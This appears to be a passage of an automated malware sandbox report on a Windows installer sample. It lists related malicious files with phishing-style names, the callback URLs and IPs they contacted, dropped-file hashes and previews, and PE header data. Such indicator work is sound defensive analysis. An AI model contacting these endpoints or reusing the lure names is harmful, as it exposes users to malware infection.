                                                                                • www.thedistrictatwestchester.com/ditf/?KvZpwPd=xqrQbuSug7mAeRb6s4MjD2XHIqcUYCAk+UoWKN0r4XMupSw1FqkJq36FBmsDIaKOVa+f&ARn=BjAtCdjxOrQ8pTgP
                                                                                purchase order PO#00011.exeGet hashmaliciousBrowse
                                                                                • www.johnnysappliancerepairs.com/amis/?r6A=HdPxEJnh&bj=zTtUbYOcJCdyZDGQWkPx4bEgpJYBwOrJPdPRmcYJS7VFwtD6RYZ6+7GYZtnd2PjK3too
                                                                                SAO_NCL INTER LOGISTICS (S) PTE LTD.exeGet hashmaliciousBrowse
                                                                                • www.4dig.net/vxwp/?FZU4DvG=Jh0YhcRqzYbzL8P5UXsQg/3UmJCgdgfp/exFxkxFO0tQIuC2rSWD5ZiJT/Z2JCDbuHKK&DzrTA=VDKPT4kXex_d1V
                                                                                yU6cC566nY.exeGet hashmaliciousBrowse
                                                                                • www.lavictoriaesdetodos.com/c239/?-ZYHTN2=lhSRtvpkm7zWY9pukIwOoQ3tVgpZpZX9v2vGgXkACtdBxIg9ivoRj9lL8ySJMzCNsF0l&LnHD=FZRHI6F8e0T
                                                                                6eXBYoJuN9.exeGet hashmaliciousBrowse
                                                                                • www.worpar.com/tmz/?Qxo=0XCUnW1BdemwRGPf/XxJ89etllI9FJ7Vz6mkmkwCCm8whZ8W1fl3/XtrociuLyPbaedFI5bdsA==&MJBD=FdFt3xJhxzShbFHP
                                                                                Emc00X3KDo.exeGet hashmaliciousBrowse
                                                                                • www.bit-coin-b2b.com/i032/
                                                                                lbqFKoALqe.exeGet hashmaliciousBrowse
                                                                                • www.stattests.com/csv8/?8pHXLLhp=SBCaTdph9BFJ+Pe0Ht/T56OwK5/x5qMPVV3KW1n9WrjJ2bCqa9ZEsGfiasNAsnzHUsjd&hbs=CnehJPdp6XLP_rwP
                                                                                Doc_37584567499454.xlsxGet hashmaliciousBrowse
                                                                                • www.stattests.com/csv8/?l48tdRq0=SBCaTdpk9GFN+fS4Ft/T56OwK5/x5qMPVVvaK278SLjI2qusdtII6CngZJh83HH0bt2tCA==&RF=fra8
                                                                                EK6BR1KS50.exeGet hashmaliciousBrowse
                                                                                • www.stattests.com/csv8/?MZBL=SBCaTdph9BFJ+Pe0Ht/T56OwK5/x5qMPVV3KW1n9WrjJ2bCqa9ZEsGfiasNqzXDHQurd&u6Td=cjot_nZ0td0D1F
                                                                                Companyprofile_Order_384658353.xlsxGet hashmaliciousBrowse
                                                                                • www.stattests.com/csv8/?mJ=SBCaTdpk9GFN+fS4Ft/T56OwK5/x5qMPVVvaK278SLjI2qusdtII6CngZJh83HH0bt2tCA==&rDHxi=mrj07b-h
                                                                                New Purchase Order 501,689$.exeGet hashmaliciousBrowse
                                                                                • www.cvbtrading.co.uk/eao/?4h0=lAvpzUGX9KkW6YMY4D87DWjr1D7s54+nPDPuw1k95OdnWwCj2pM4Ft1Y7NJ2d65wIUfg&wR=OtxhY2
                                                                                New Purchase Order 50,689$.exeGet hashmaliciousBrowse
                                                                                • www.cvbtrading.co.uk/eao/?p0D=lAvpzUGX9KkW6YMY4D87DWjr1D7s54+nPDPuw1k95OdnWwCj2pM4Ft1Y7NF2Oq1zREf2MnJCBg==&tFQh=XRclsNQPL8U
                                                                                New Purchase Order 50,689$.exeGet hashmaliciousBrowse
                                                                                • www.cvbtrading.co.uk/eao/?Yvux40tX=lAvpzUGX9KkW6YMY4D87DWjr1D7s54+nPDPuw1k95OdnWwCj2pM4Ft1Y7OpMNrZISz+n&Pp=jfLprdxxs
                                                                                Eurobank Transaction.exeGet hashmaliciousBrowse
                                                                                • www.janewagtus.com/3nop/?Jlq=Z0G4H2Jhj&_zuLcVAp=XwQEFbPdAe8RC3KQJUbvaT4aerhUkRg+DnVMzGambLllbqglBOjO8af2J4RSYf9mQ0RS
                                                                                http://www.rejuvenatemedicalspa.netGet hashmaliciousBrowse
                                                                                • www.rejuvenatemedicalspa.net/
                                                                                15Purchase.exeGet hashmaliciousBrowse
                                                                                • www.butaeventscatering.com/bu/?9r3l=YiEFMluwGnBmHitO4gsciCUePvQdW+NV5cUtbNa8QVlRAP8AMA28Ps0l1rVepT5RTkfVLUab7+a340LaQn7w&3fpTd=TL0xlp5HqjmHdV
                                                                                192.0.78.24Payment copy_MT103_9847.exeGet hashmaliciousBrowse
                                                                                • www.jornadadeproposito.com/p6nu/?5jYLcPK=KtXlZG1MDOZFWP5t9YcyG1YTs743rvCOSznZGD3YxkY1/Yc+FQIWM8xCgyvVxNimUsWE&X8mhB2=5jkpX2b8GHg
                                                                                Gz98aWSGb5.exeGet hashmaliciousBrowse
                                                                                • www.unapersonaestabien.com/m3rc/?_BZ=o7izuhN0eiDBtRVTd1lDz6WKoPkNEuauPIN5CezYSPQXzsgO8JvVj8I3N0VIsRkybf5kH8xatg==&i48XM4=6lXxZB08
                                                                                LEMO.exeGet hashmaliciousBrowse
                                                                                • www.winterpublishinghouse.com/aipc/?f6A8Sz=Z9mnZyfY5CpLAzXPPb3enFLkttc7m+LSSJAo0MNQKNo/LlAoS/712uitoBhdXpdyq+qb&sDKp4l=3fHXUDz8CN-
                                                                                1.exeGet hashmaliciousBrowse
                                                                                • www.acrostuttgart.com/u6e4/?hb9Xz=Yhu6TshARwIoNbZ1x2iC8x1g/pbDvoJ9Rk8hKXUW+vXycfOoNZe1P9zxob48TjTPlsWA&c8=JDK0FTTh_xKtI4B
                                                                                rtgs_2021-06-07_02-01.exeGet hashmaliciousBrowse
                                                                                • www.easynlean.com/uecu/?3f30dp=Zf0HXpXHq84PAdrP&E4k=F8016VyzM1JTHnrEuGu47WSgGKrxD9PfY9mcGh42htmqMoXzmTppL0JZy4KDS3X6tRzp
                                                                                ] New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                                                • www.mykiwidesign.com/un8c/?8p=shtUrfI/xlBO8C2aliNZenIpYotasWnDtIq4lctURnres2cu8VpZnDv2KHIrTwDBcoSX&h6Z=FZOTUTGPt4-
                                                                                STATEMENT.exeGet hashmaliciousBrowse
                                                                                • www.vrvvrf.com/s5cm/?7nwhw=m8vN0kLa85K6oU4T+ITvevq7r3PYb0uvJBSJVcJsVJjYueOzrA4fHZ5+1OOIPpyaNc8F&ML=EZBXFN7pQ8l
                                                                                LQrGhleECP.exeGet hashmaliciousBrowse
                                                                                • www.philreid4cc.com/dxe/?W8Mp8l=s4725d3Oabb4GJPvvzs1NGtrQqdCSFbT14B5hiC+hEbCkkM6v8NMU0M9YE5BiqTyeHs9&j6t4MD=ktcPu
                                                                                003 SOA.exeGet hashmaliciousBrowse
                                                                                • www.thortcircuit.com/hme1/?6l-x=2YNiVCg1HFxx3pWBlJet9DA2QXWGNYZsyAyNRB+QsGrDR5moNFNVdH9eeZdldT++LaB4&q450=lHkpfvh8-6gxYnb
                                                                                Bank transfer copy.xlsxGet hashmaliciousBrowse
                                                                                • www.letsreflectonline.net/xkcp/
                                                                                RE KOC RFQ for Flanges - RFQ 2074898.exeGet hashmaliciousBrowse
                                                                                • www.acrostuttgart.com/u6e4/?u6u0=Yhu6TshARwIoNbZ1x2iC8x1g/pbDvoJ9Rk8hKXUW+vXycfOoNZe1P9zxob48TjTPlsWA&9rQl7=xP04lrqp
                                                                                rove.exeGet hashmaliciousBrowse
                                                                                • www.winterpublishinghouse.com/aipc/?bv4=Z9mnZyfY5CpLAzXPPb3enFLkttc7m+LSSJAo0MNQKNo/LlAoS/712uitoCBNYINK0bDc&6lSp=ArO83PE0Mh0TtZa0
                                                                                SHIPPING DOCUMENT_7048555233PDF.exeGet hashmaliciousBrowse
                                                                                • www.annafelicia.com/s5cm/?p0G=ndfPKtxxGRrhJ&jrTDmX=hOQz2MSCtbsxDabSpaSii8/BLtQrJH/yS4IrOYS2fNok4Vr2pjerCtCMkXjIcTV9nsbq
                                                                                USU(1).exeGet hashmaliciousBrowse
                                                                                • www.thegreenpandablog.com/zrmt/?P0G=EjUHInR&9r7T-=J09lyTGn9S5rIToQcgF0c51IGS+OfxW0xoKNzG6aM/w/AgGV1VzZrO0ZiJtbcGpPM5Lb
                                                                                Purchase Order.pdf.exeGet hashmaliciousBrowse
                                                                                • www.abemedia.digital/gad0/?1bB=/+tCXqr0gdanEXIrEzSrj72VRhl5gvMKZr+3SkiVsUrE8Neij8YjDVUIRA4MYZFQuvm8&3fS=dfc8-RnPKT4
                                                                                REQUEST_QUOTATION.exeGet hashmaliciousBrowse
                                                                                • www.leetranscreations.com/owws/?wh=aFXjGSNeyc6Ugx97af8VQ8VI0qEUD4Nx9YtV38rOMEW/LmZ8Os3H8FDEWrOsqvRI5MwQ&Sh=CpCLnL8
                                                                                Pdf MT103 - Remittance.pdf.exeGet hashmaliciousBrowse
                                                                                • www.vrvvrf.com/s5cm/?kR-4q=m8vN0kLa85K6oU4T+ITvevq7r3PYb0uvJBSJVcJsVJjYueOzrA4fHZ5+1OCIc5+ZUM8Ty3WWlQ==&P0D=Atxturd
                                                                                Inv3063200.exeGet hashmaliciousBrowse
                                                                                • www.sebastiansanchezgonzalez.com/vfm2/?k2MdtP=dk6o8Jn40n+32krysyfR8rO7wNHyWZLWF1780NbDI2i8UvXeeWH5XDxm9NpiB8EhKtTZ&NZitYp=zL3h2V_pyz
                                                                                CONTRACT RFQ.xlsxGet hashmaliciousBrowse
                                                                                • www.micheldrake.com/p2io/?y488S=6l58NVGphzNX&LPRlm=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==
                                                                                noSpfWQqRD.exeGet hashmaliciousBrowse
                                                                                • www.micheldrake.com/p2io/?lZB=UFQxwXQ82Xg4fjY&ndphCh4=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+a1Y8u0zs/SS1CQHpw==

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                s.multiscreensite.comAWB 6299764041.exeGet hashmaliciousBrowse
                                                                                • 35.172.94.1
                                                                                SKMBT_C224307532DL23457845_Product Order doc.exeGet hashmaliciousBrowse
                                                                                • 100.24.208.97
                                                                                PO#270521.pdf.exeGet hashmaliciousBrowse
                                                                                • 35.172.94.1
                                                                                2a#U062c.exeGet hashmaliciousBrowse
                                                                                • 100.24.208.97
                                                                                RFQ_OB Jiefeng E&E Co Ltd.exeGet hashmaliciousBrowse
                                                                                • 35.172.94.1
                                                                                SAO_NCL INTER LOGISTICS (S) PTE LTD.exeGet hashmaliciousBrowse
                                                                                • 100.24.208.97
                                                                                yU6cC566nY.exeGet hashmaliciousBrowse
                                                                                • 100.24.208.97
                                                                                S343160101221012616310.exeGet hashmaliciousBrowse
                                                                                • 35.172.94.1
                                                                                FPZaxqP7uB.exeGet hashmaliciousBrowse
                                                                                • 35.172.94.1
                                                                                lbqFKoALqe.exeGet hashmaliciousBrowse
                                                                                • 100.24.208.97
                                                                                Doc_37584567499454.xlsxGet hashmaliciousBrowse
                                                                                • 100.24.208.97
                                                                                mtsWWNDaNF.exeGet hashmaliciousBrowse
                                                                                • 35.172.94.1
                                                                                EK6BR1KS50.exeGet hashmaliciousBrowse
                                                                                • 100.24.208.97
                                                                                yxYmHtT7uT.exeGet hashmaliciousBrowse
                                                                                • 35.172.94.1
                                                                                Order_00009.xlsxGet hashmaliciousBrowse
                                                                                • 35.172.94.1
                                                                                SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                                                                • 35.172.94.1
                                                                                Companyprofile_Order_384658353.xlsxGet hashmaliciousBrowse
                                                                                • 100.24.208.97
                                                                                New Purchase Order 501,689$.exeGet hashmaliciousBrowse
                                                                                • 100.24.208.97
                                                                                New Purchase Order 50,689$.exeGet hashmaliciousBrowse
                                                                                • 100.24.208.97
                                                                                Scan_ 034 (1).exeGet hashmaliciousBrowse
                                                                                • 35.172.94.1
                                                                                pixie.porkbun.comSKlGhwkzTi.exeGet hashmaliciousBrowse
                                                                                • 44.227.65.245
                                                                                bbZdhGxjJW.exeGet hashmaliciousBrowse
                                                                                • 44.227.76.166
                                                                                CONTRACT 312000123 SSR ADVICE.xlsxGet hashmaliciousBrowse
                                                                                • 44.227.76.166
                                                                                Purchase Order.pdf.exeGet hashmaliciousBrowse
                                                                                • 44.227.76.166
                                                                                PO01837.exeGet hashmaliciousBrowse
                                                                                • 44.227.76.166
                                                                                bank slip_pdf.exeGet hashmaliciousBrowse
                                                                                • 44.227.76.166
                                                                                netwire.exeGet hashmaliciousBrowse
                                                                                • 44.227.76.166
                                                                                f268bad6_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                • 44.227.76.166
                                                                                noSpfWQqRD.exeGet hashmaliciousBrowse
                                                                                • 44.227.76.166
                                                                                92270fdd_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                • 44.227.76.166
                                                                                1cec9342_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                • 44.227.76.166
                                                                                PP,Sporda.exeGet hashmaliciousBrowse
                                                                                • 44.227.76.166
                                                                                SNBDBM2No4.exeGet hashmaliciousBrowse
                                                                                • 44.227.76.166
                                                                                PO09641.exeGet hashmaliciousBrowse
                                                                                • 44.227.76.166
                                                                                2eb5d3ef_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                • 44.227.76.166
                                                                                0a97784c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                • 44.227.76.166
                                                                                FORM C.xlsxGet hashmaliciousBrowse
                                                                                • 44.227.76.166
                                                                                5PthEm83NG.exeGet hashmaliciousBrowse
                                                                                • 44.227.76.166
                                                                                Invoice.exeGet hashmaliciousBrowse
                                                                                • 44.227.76.166
                                                                                o52k2obPCG.exeGet hashmaliciousBrowse
                                                                                • 44.227.76.166

                                                                                ASN

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                AUTOMATTICUSSKM_4050210326102400 jpg.exeGet hashmaliciousBrowse
                                                                                • 192.0.78.138
                                                                                arm_crypt.exeGet hashmaliciousBrowse
                                                                                • 192.0.78.13
                                                                                Payment copy_MT103_9847.exeGet hashmaliciousBrowse
                                                                                • 192.0.78.24
                                                                                Gz98aWSGb5.exeGet hashmaliciousBrowse
                                                                                • 192.0.78.24
                                                                                42sB3Upj67.exeGet hashmaliciousBrowse
                                                                                • 74.114.154.18
                                                                                LEMO.exeGet hashmaliciousBrowse
                                                                                • 192.0.78.24
                                                                                Swift_Report.exeGet hashmaliciousBrowse
                                                                                • 192.0.78.25
                                                                                RE6WxoVS7v.exeGet hashmaliciousBrowse
                                                                                • 74.114.154.22
                                                                                VvaBHdJoGY.exeGet hashmaliciousBrowse
                                                                                • 74.114.154.22
                                                                                swift_copy.exeGet hashmaliciousBrowse
                                                                                • 192.0.78.25
                                                                                ILlLrEtVb1.exeGet hashmaliciousBrowse
                                                                                • 74.114.154.18
                                                                                BB12Wh8OGQ.exeGet hashmaliciousBrowse
                                                                                • 74.114.154.18
                                                                                jo3GzZMQBG.exeGet hashmaliciousBrowse
                                                                                • 74.114.154.18
                                                                                j6jV0KDfAf.exeGet hashmaliciousBrowse
                                                                                • 74.114.154.18
                                                                                pVs9Vm0z1O.exeGet hashmaliciousBrowse
                                                                                • 74.114.154.18
                                                                                FK1RtVDPVt.exeGet hashmaliciousBrowse
                                                                                • 74.114.154.22
                                                                                Mv1cu7Adsm.exeGet hashmaliciousBrowse
                                                                                • 74.114.154.18
                                                                                main_setup_x86x64.exeGet hashmaliciousBrowse
                                                                                • 74.114.154.22
                                                                                b9f5bca9a22f08aad48674bc42e4eaf72ab8aa3d652ba.exeGet hashmaliciousBrowse
                                                                                • 74.114.154.18
                                                                                w4X8dxtGi6.exeGet hashmaliciousBrowse
                                                                                • 74.114.154.22
                                                                                AMAZON-AESUSaQsaMPCA7J.exeGet hashmaliciousBrowse
                                                                                • 23.21.245.0
                                                                                arm_crypt.exeGet hashmaliciousBrowse
                                                                                • 18.205.135.125
                                                                                omsh.dllGet hashmaliciousBrowse
                                                                                • 107.22.233.72
                                                                                trendbanter_v2.apkGet hashmaliciousBrowse
                                                                                • 50.19.92.227
                                                                                b8H57DyrVF.exeGet hashmaliciousBrowse
                                                                                • 54.225.78.40
                                                                                Payment copy_MT103_9847.exeGet hashmaliciousBrowse
                                                                                • 3.223.115.185
                                                                                omh.dllGet hashmaliciousBrowse
                                                                                • 50.16.218.217
                                                                                AgentSetup_FDR.exeGet hashmaliciousBrowse
                                                                                • 54.88.94.23
                                                                                SecuriteInfo.com.BackDoor.Rat.281.18292.exeGet hashmaliciousBrowse
                                                                                • 50.16.242.146
                                                                                AZ2066 Elektronische Zustellung.pdf.jsGet hashmaliciousBrowse
                                                                                • 54.235.83.248
                                                                                AZ2066 Elektronische Zustellung.pdf.jsGet hashmaliciousBrowse
                                                                                • 23.23.104.250
                                                                                Gz98aWSGb5.exeGet hashmaliciousBrowse
                                                                                • 54.237.120.40
                                                                                KK71rkO0Tf.exeGet hashmaliciousBrowse
                                                                                • 54.225.125.76
                                                                                WP7IsjaUga.exeGet hashmaliciousBrowse
                                                                                • 52.20.84.62
                                                                                PTIR6O6xXy.exeGet hashmaliciousBrowse
                                                                                • 54.147.194.143
                                                                                7#U1d05.htmlGet hashmaliciousBrowse
                                                                                • 54.92.247.41
                                                                                bMovQzpzYUDTvQh.exeGet hashmaliciousBrowse
                                                                                • 52.6.206.192
                                                                                J1Dud83xTM.exeGet hashmaliciousBrowse
                                                                                • 54.85.86.211
                                                                                PO-ENQAQT390230220.docxGet hashmaliciousBrowse
                                                                                • 54.83.52.76
                                                                                PO-ENQAQT390230220.docxGet hashmaliciousBrowse
                                                                                • 54.83.52.76

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                C:\Users\user\AppData\Local\Temp\nsuBF4B.tmp\System.dll7ujc2szSQX.exeGet hashmaliciousBrowse
                                                                                  TT0900090000090.exeGet hashmaliciousBrowse
                                                                                    Poczta Polska Informacje o transakcjach2021.exeGet hashmaliciousBrowse
                                                                                      PO-006 dtd-15.06.2021.exeGet hashmaliciousBrowse
                                                                                        SKM_4050210326102400 jpg.exeGet hashmaliciousBrowse
                                                                                          IMGG087 76543.exeGet hashmaliciousBrowse
                                                                                            yfr02XrveJ.exeGet hashmaliciousBrowse
                                                                                              LCdraft6152021_pdf.exeGet hashmaliciousBrowse
                                                                                                LCdraft6152021_pdf.exeGet hashmaliciousBrowse
                                                                                                  Consigment Details_pdf.exeGet hashmaliciousBrowse
                                                                                                    bigfish.exeGet hashmaliciousBrowse
                                                                                                      INQUIRY for IFM 20207.xlsxGet hashmaliciousBrowse
                                                                                                        gz7dLhKlSQ.exeGet hashmaliciousBrowse
                                                                                                          WGOc4eHYqX.exeGet hashmaliciousBrowse
                                                                                                            Purchase_Order.xlsxGet hashmaliciousBrowse
                                                                                                              ojmanoq.exeGet hashmaliciousBrowse
                                                                                                                linkfuq.exeGet hashmaliciousBrowse
                                                                                                                  takwqaytr.exeGet hashmaliciousBrowse
                                                                                                                    PO_403.xlsxGet hashmaliciousBrowse
                                                                                                                      Purchase_Order_150621.xlsxGet hashmaliciousBrowse

                                                                                                                        Created / dropped Files

                                                                                                                        C:\Users\user\AppData\Local\Temp\1z5waydzpi63ss5egqv
                                                                                                                        Process:C:\Users\user\Desktop\RFQ-BCM 03122020.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):164352
                                                                                                                        Entropy (8bit):7.998930773810573
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:3072:RW0+oa3GvcnS4QUj8vGGdM/5nNmpuqpFJrKjoL94Q1a17q+njTnaMFNuOXL:RWkaWUhQu2unNCuqToj894c673nHa4cW
                                                                                                                        MD5:6F720D598D207B318013A948EFC4916A
                                                                                                                        SHA1:104B5232C72E1FE460838FE081E5001504236D06
                                                                                                                        SHA-256:391B30020602EBBB3E0B5FDF30D606438ADC593B4F572A7AE391F7B2D004ED46
                                                                                                                        SHA-512:3BA2EAE144375F185A88B630232676AB0F098299E25F736CF330C4ECF87FF2D99C391118334075C6AA52515081FCF897CE4BE343E00EA41496AA2B9FA2042258
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview: .X... .{,.z.*..F/X.....6I?.F...$.\ss.k.DV..9B.UJ.9.4.....]QET...../....5`...F..?...X.4..U.5.V.......|j!l..sW.....o......k".cI.0.Hu...e._KN..........0@.fd._&..(f<.$...8&*......5.K1=&..$..x....d.,..|6.S3'(o.....Y..!YPo.a..g .yD..nL3.B..V.%...(..?E..}...5.x..g..+A yd$.D.}..j.@.........o.B..^..g..>.[n....?...\..OT".Pa....?K.9..c...q....N....I.S...C<.!I>.+.w.e...Nu..O.^%Z.J.6...EO......Q.-....."h.<.|../bv....Z..?eHZ...G..x.m;......K.>..k2..qO........F.&..I.*.U....<.f.n.....}'.s....(T.5...K.qRm...4.=.Q....PS......e.iC...&.m.......%....?.q..i.........c.*..o...KMQ..C...2.82=.].3.|q!.Z..!O>V...;-....}..%.}..C$.F..x7Q#....3?.....Z.....9....,zd.. 'o$...L....kaAm..$..v......Q.@H.[...U .=H..J.q..R=3.4..qZ.=3..{...u..Vd..e.U.._.iF.?.L.*eo&`.....[r'... .n0..#...j.#.v.i0.%T..[..*......E6QlhU..R...=LL.<.0..;.)......S?.]. \p?.Z...n.[f.i.M....O...p_ .*P..Q..mr^..v.....L.{....\.Na..T..c.U.;.p...(.....jK~u..{-..1....K.....[..,.@.8D..xw.,V.]..&.....}..2...K..2.....
                                                                                                                        C:\Users\user\AppData\Local\Temp\nsuBF4B.tmp\System.dll
                                                                                                                        Process:C:\Users\user\Desktop\RFQ-BCM 03122020.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):11776
                                                                                                                        Entropy (8bit):5.855045165595541
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                                                        MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                                                        SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                                                        SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                                                        SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: 7ujc2szSQX.exe, Detection: malicious, Browse
                                                                                                                        • Filename: TT0900090000090.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Poczta Polska Informacje o transakcjach2021.exe, Detection: malicious, Browse
                                                                                                                        • Filename: PO-006 dtd-15.06.2021.exe, Detection: malicious, Browse
                                                                                                                        • Filename: SKM_4050210326102400 jpg.exe, Detection: malicious, Browse
                                                                                                                        • Filename: IMGG087 76543.exe, Detection: malicious, Browse
                                                                                                                        • Filename: yfr02XrveJ.exe, Detection: malicious, Browse
                                                                                                                        • Filename: LCdraft6152021_pdf.exe, Detection: malicious, Browse
                                                                                                                        • Filename: LCdraft6152021_pdf.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Consigment Details_pdf.exe, Detection: malicious, Browse
                                                                                                                        • Filename: bigfish.exe, Detection: malicious, Browse
                                                                                                                        • Filename: INQUIRY for IFM 20207.xlsx, Detection: malicious, Browse
                                                                                                                        • Filename: gz7dLhKlSQ.exe, Detection: malicious, Browse
                                                                                                                        • Filename: WGOc4eHYqX.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Purchase_Order.xlsx, Detection: malicious, Browse
                                                                                                                        • Filename: ojmanoq.exe, Detection: malicious, Browse
                                                                                                                        • Filename: linkfuq.exe, Detection: malicious, Browse
                                                                                                                        • Filename: takwqaytr.exe, Detection: malicious, Browse
                                                                                                                        • Filename: PO_403.xlsx, Detection: malicious, Browse
                                                                                                                        • Filename: Purchase_Order_150621.xlsx, Detection: malicious, Browse
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\tqkpaveks
                                                                                                                        Process:C:\Users\user\Desktop\RFQ-BCM 03122020.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):56993
                                                                                                                        Entropy (8bit):4.968118288232998
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:clYo0jQ2976D2I0LGt3jle1/fBD5TVQ+Ra:AjJKfG5e1/5Do+I
                                                                                                                        MD5:A102679195215C4D8C0D2268D893BFAD
                                                                                                                        SHA1:CCC042C16220FDDFCC4305D65B5E388B78C7ECD4
                                                                                                                        SHA-256:CEA09A342F707129F978EEDB8AB69E5DE167DD7E6387CE499E543272B69B7357
                                                                                                                        SHA-512:696F11D4B7CB2D85276D9D6306A97FDAD50F68A0073AA3EDCBAE843D801ED294A6CED9225D92A8050181D29755308D1B5B73E7D30D7259D7CF028C4734C10239
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview: U.......c....................q.....a.....a...........,....... .....!...o."...}.#...a.$.....%...,.&.....'.....(.....)...e.*...p.+...a.,...a.-.........Z./.....0...a.1...0.2.....3...y.4...q.5...a.6...a.7...a.8.....9.....:...5.;.....<.....=.....>.....?...b.@...y.A...a.B.....C.....D...,.E.....F.....G.....H...a.I...a.J...,.K.....L.....M.....N.....O.....P.....Q...,.R.....S...y.T.....U.....V.....W...y.X.....Y.....Z...0.[.....\...!.].....^...a._...a.`...a.a.....b.....c.....d...x.e...x.f...x.g.....h.....i...=.j.....k...b.l...!.m...a.n.....o.....p...,.q.....r...=.s.....t...a.u...a.v...,.w.....x...=.y.....z.....{.....|...=.}...,.~.........!.......................!.................0.......................a.....a.....a.................].....x.....x.....x.................e...........b...........a.................,...........e...........a.....a.....,...........e

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                        Entropy (8bit):7.902952243402125
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                                        • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:RFQ-BCM 03122020.exe
                                                                                                                        File size:222795
                                                                                                                        MD5:d3d5e6cafa8ca89384e56e6374a14203
                                                                                                                        SHA1:ba57aa266efd34ec5fe657c13ecda85e97ad5b5c
                                                                                                                        SHA256:214910524a528bab8dae4a704169e20d9f2f92444df6e6a65d19decafd9f69b0
                                                                                                                        SHA512:615e3abe07739af22fea6ba66b7d54f83652704adc237ef7ff3c21780e23d11bec7bab1f9b58e4c6cf0aed54b2fc9ba697520b18618bde88613bb07294c10cd6
                                                                                                                        SSDEEP:6144:cQqTvWkaWUhQu2unNCuqToj894c673nHa4c0t:yvWkpUEu/AHYvco
                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z.........

                                                                                                                        File Icon

                                                                                                                        Icon Hash:b2a88c96b2ca6a72

                                                                                                                        Static PE Info

                                                                                                                        General

                                                                                                                        Entrypoint:0x4030cb
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                        Time Stamp:0x4B1AE3C1 [Sat Dec 5 22:50:41 2009 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:4
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:4
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:4
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:7fa974366048f9c551ef45714595665e

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        sub esp, 00000180h
                                                                                                                        push ebx
                                                                                                                        push ebp
                                                                                                                        push esi
                                                                                                                        xor ebx, ebx
                                                                                                                        push edi
                                                                                                                        mov dword ptr [esp+18h], ebx
                                                                                                                        mov dword ptr [esp+10h], 00409160h
                                                                                                                        xor esi, esi
                                                                                                                        mov byte ptr [esp+14h], 00000020h
                                                                                                                        call dword ptr [00407030h]
                                                                                                                        push 00008001h
